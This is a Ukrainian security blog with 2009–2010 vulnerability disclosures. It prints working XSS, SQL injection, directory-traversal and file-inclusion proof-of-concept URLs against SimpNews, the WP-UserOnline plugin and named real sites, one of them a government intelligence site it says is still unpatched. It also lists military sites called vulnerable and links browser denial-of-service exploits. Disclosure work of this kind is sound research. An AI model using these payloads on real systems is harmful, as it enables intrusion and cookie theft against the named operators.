Websecurity - Веб безпека

29.05.2010

У жовтні, 26.10.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в SimpNews. Дані уразливості я виявив на www.boesch-it.de - офіційному сайті веб додатку. Про що найближчим часом повідомлю розробникам. Які також є розробниками SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

09.07.2010

Full path disclosure:

http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1

XSS:

http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі SimpNews V2.47.03 та попередні версії. В версії SimpNews V2.48.01 дані уразливості були виправлені.

Продовжу тему витоку інформації про версію системи. Як я зазначав, виведення версії системи - це поширена функція у веб додатках та веб системах. Багато різних движків виводять інформацію про версію системи і дана можливість движків є уразливістю. Це витік інформації (Information Leakage) про версію системи, що може бути використаний для атаки на сайти, що використовують даний движок.

Наведу нові приклади Information Leakage уразливостей в різних веб додатках (зокрема форумах), що приводять до витоку інформації про версію системи.

IPB

В IPB на кожній сторінці форуму виводиться версія системи (Powered by Invision Power Board v1.3).

phpBB

В phpBB версію системи можна дізнатися в файлах http://site/docs/CHANGELOG.html, http://site/docs/INSTALL.html та http://site/docs/README.html (phpBB 2.0.13).

vBulletin

В vBulletin на кожній сторінці форуму виводиться версія системи (Powered by vBulletin Version 3.8.2).

SMF

В SMF на кожній сторінці форуму виводиться версія системи (Powered by SMF 1.1.11).

YaBB

В YaBB на кожній сторінці форуму виводиться версія системи (Powered by YaBB 2.4).

В даній добірці уразливості в веб додатках:

• phion airlock Web Application Firewall: Remote Denial of Service via Management Interface (unauthenticated) and Command Execution (деталі)
• Ziggurat CMS Multiple Vulnerabilities (деталі)
• 60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability (деталі)
• Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability (деталі)
• Apache OFBiz Multiple XSS Vulnerabilities (деталі)
• Unisys Business Information Server Stack Buffer Overflow (деталі)
• User Invoices Persistent XSS Vulnerability in CactuShop (деталі)
• e107 Content Management Plugin Script Insertion Vulnerability (деталі)
• IP address spoofing in e107 (деталі)
• Trustwave’s SpiderLabs Security Advisory TWSL2009-002 - Multiple vulnerabilities in Cisco ASA Web VPN (деталі)

30.11.2009

У квітні, 10.04.2009, я знайшов Cross-Site Scripting та SQL Injection уразливості на http://www.szru.gov.ua - сайті Служби Зовнішньої Розвідки України, що також доступний за адресою http://www.fisu.gov.ua. Це при тому, що з 2007 року вони так і не виправили ще одну SQL Injection уразливість. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.szru.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.07.2010

XSS:

• alert(document.cookie)
• цікавий

Це ще один приклад XSS атак через помилки при запитах до БД.

SQL Injection:

http://www.szru.gov.ua/cms/ua%20where%201=1–%20/

Через дану уразливість зокрема можна проводити DoS атаки.

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Cisco Physical Access Gateway Denial of Service Vulnerability (деталі)
• MyBB Password Reset Email BCC: Injection Vulnerability (деталі)
• MyBB Password Reset Weak Random Numbers Vulnerability (деталі)
• Skype URI Handler Input Validation (деталі)
• Skype Protocol Handler datapath Argument Injection Remote Code Execution Vulnerability (деталі)
• Skype URI Processing Arbitrary XML File Deletion Vulnerability (деталі)
• e107 Avatar/Photograph Image File Upload Vulnerability (деталі)
• RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities (деталі)
• Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability (деталі)
• WebAsyst Shop-Script Multiple Input Validation Vulnerabilities (деталі)

01.12.2009

У квітні, 13.04.2009, я знайшов Directory Traversal, Local File Inclusion, Full path disclosure та Cross-Site Scripting уразливості на проекті http://mmr.net.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2010

Directory Traversal:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=../../../.htaccess%00

Local File Inclusion:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=../file.php

Full disclosure:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=1

XSS:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• Vulnerabilities in Cisco Video Surveillance Products (деталі)
• Police Municipale Open Main Courante 1.01beta (RFI/LFI) Multiple File Include Vulnerability (деталі)
• Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability (деталі)
• MKPortal Contact module XSS Vulnerability (деталі)
• Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vuln (деталі)
• Openstock Facture 2.02 Local File Include Vulnerability (деталі)
• Opentel Openmairie tel 1.02 Local File Include Vulnerability (деталі)
• Vana CMS Remote File Download (деталі)
• Sun Java Web Start Arbitrary Command Execution Vulnerability (деталі)
• Sun Java Runtime AWT setDifflCM Stack Overflow Vulnerability (деталі)

30.04.2010

У квітні, 26.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні WP-UserOnline для WordPress. Дані уразливості я виявив на одному сайті, що використовує даний плагін. Про що найближчим часом сповіщу розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

01.07.2010

XSS:

За допомогою спеціального запиту до сайта можна провести XSS атаку. Для цього потрібно спеціальним чином (не через браузер) відправити GET запит до сторінки http://site/?<script>alert(document.cookie)</script>.

Цe persistent XSS. Уразливість проявляється на сторінці http://site/wp-admin/index.php?page=wp-useronline.

Full path disclosure:

http://site/wp-content/plugins/wp-useronline/admin.php

http://site/wp-content/plugins/wp-useronline/widget.php

http://site/wp-content/plugins/wp-useronline/wp-stats.php

http://site/wp-content/plugins/wp-useronline/wp-useronline.php

http://site/wp-content/plugins/wp-useronline/scb/Widget.php

http://site/wp-content/plugins/wp-useronline/scb/load.php

Уразливі WP-UserOnline 2.62 та попередні версії. В версії WP-UserOnline 2.70 розробник виправив XSS, але не Full path disclosure уразливості.

24.12.2012

Експлоіт на Perl:

WP-UserOnline.txt

Експлоіт для даної уразливості, що я розробив 26.04.2010.

Раніше я розповідав про DoS атаки на різні браузери через різні обробники протоколів. А зараз розповів про дослідження стосовно атаки через протоколи http та ftp, що я провів ще в 2008 році.

В вересні, 18.09.2008, я виявив File Download та Denial of Service уразливості в Mozilla Firefox, Internet Explorer, Google Chrome та Opera. Дане дослідження я розпочав після виявлення в вересні численних Automatic File Download уразливістей в Google Chrome, про які я детально розповів в статті Automatic File Download уразливості в браузерах.

Метою даного дослідженням було створення методики проведення File Download атак в різних браузерах (та DoS атак через SaveAs функціонал). Яку я назвав SaveAs атака (SaveAs attack).

І хоча дана атака не відбувається автоматично (як це мало місце в перших версіях Chrome - в більш нових версіях свого браузера Google виправила дану уразливість, після моїх повідомлень, і браузер запитує перед викаченням файлів), але за рахунок постійного відображення вікна збереження файлу, користувач може випадково натиснути на “Save” і зберегти файл. На відміну від Automatic File Download в Chrome, дана атака працює в різних браузерах (в тому числі в нових версіях Chrome).

Тому даний метод може використовуватися для примусового збереження файла на комп’ютері користувача. А також даний метод може застосовуватися для проведення DoS атаки (через створення багатьох вікон для збереження файлів). File Download атака може призвести до Code Execution, якщо користувач потім відкриє файл (шкідливий), який був ним збережений.

Дані File Download та DoS атаки проводяться через протоколи http і ftp. В експлоітах я вказав файли на серверах Google (для http) та Microsoft (для ftp) - в даних компаній більше серверних потужностей для даної задачі.

DoS атаки відноситься до типу блокуючих DoS та DoS через споживання ресурсів. Дані дві атаки можна провести як з використанням JS, так і без нього (створивши сторінку з великою кількістю iframe, а в Chrome також можна використати frame).

File Download та DoS:

Firefox, IE, Chrome & Opera DoS Exploit6.html (http протокол)

Firefox, IE, Chrome & Opera DoS Exploit7.html (ftp протокол)

Обидва експлоіти працюють в Mozilla Firefox 3.0.19 (і окрім попередніх версій, вони повинні працювати в 3.5.x та 3.6.x), Internet Explorer 6 (6.0.2900.2180), Google Chrome 1.0.154.48 та Opera 9.52.

У браузерах Firefox, IE6 та Opera відбувається блокування та споживання ресурсів (а Firefox 3.0.1 взагалі вилітав). В Chrome відбувається блокування браузера. Але обидва експлоіти не працють в IE8.

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 10 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві державні mil-сайти: www.mil.ee, portal.navfac.navy.mil, www.cs.amedd.army.mil, w20.afpc.randolph.af.mil, www.stsc.hill.af.mil.